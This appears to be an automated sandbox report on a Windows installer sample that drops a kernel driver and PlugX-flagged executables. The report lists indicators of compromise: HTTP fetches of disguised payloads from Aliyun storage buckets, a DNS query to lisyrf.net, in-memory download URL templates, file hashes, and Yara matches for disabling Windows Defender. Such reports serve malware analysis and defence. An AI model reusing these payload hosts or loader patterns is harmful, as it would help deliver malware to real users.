ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 8.212.102.187
Source: unknown	TCP traffic detected without corresponding DNS query: 8.212.102.187
Source: unknown	TCP traffic detected without corresponding DNS query: 8.212.102.187
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: jx2zg4.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: jx2zg4.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: lisyrf.net

Source: mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002.
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002~
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgD
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgalFilenameCmd.Exej%
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgh
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgom
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgU~
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgndows
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgy
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/N
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/V
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: WchJz1.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 39.103.20.20:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49743 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.WchJz1.exe.27e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 39.2.mm3ujg.exe.2d20000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: mm3ujg.exe PID: 2688, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_0000000140006C95 NtAllocateVirtualMemory,

4_2_0000000140006C95

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

4_2_0000000140001520

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_000000014000C3F0	4_2_000000014000C3F0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_000000014000CC00	4_2_000000014000CC00
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_0000000140001A30	4_2_0000000140001A30
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_000000014000C2A0	4_2_000000014000C2A0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00000001400022C0	4_2_00000001400022C0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00000001400110F0	4_2_00000001400110F0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_0000000140010CF0	4_2_0000000140010CF0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_0000000140009300	4_2_0000000140009300
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_000000014000BB70	4_2_000000014000BB70
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_0000000140003F80	4_2_0000000140003F80
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00000001400103D0	4_2_00000001400103D0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00007FFE11BDA1B8	4_2_00007FFE11BDA1B8
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00007FFE11BE0248	4_2_00007FFE11BE0248
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Code function: 41_2_008E4AE2	41_2_008E4AE2

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\mm3ujg\mm3ujg.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
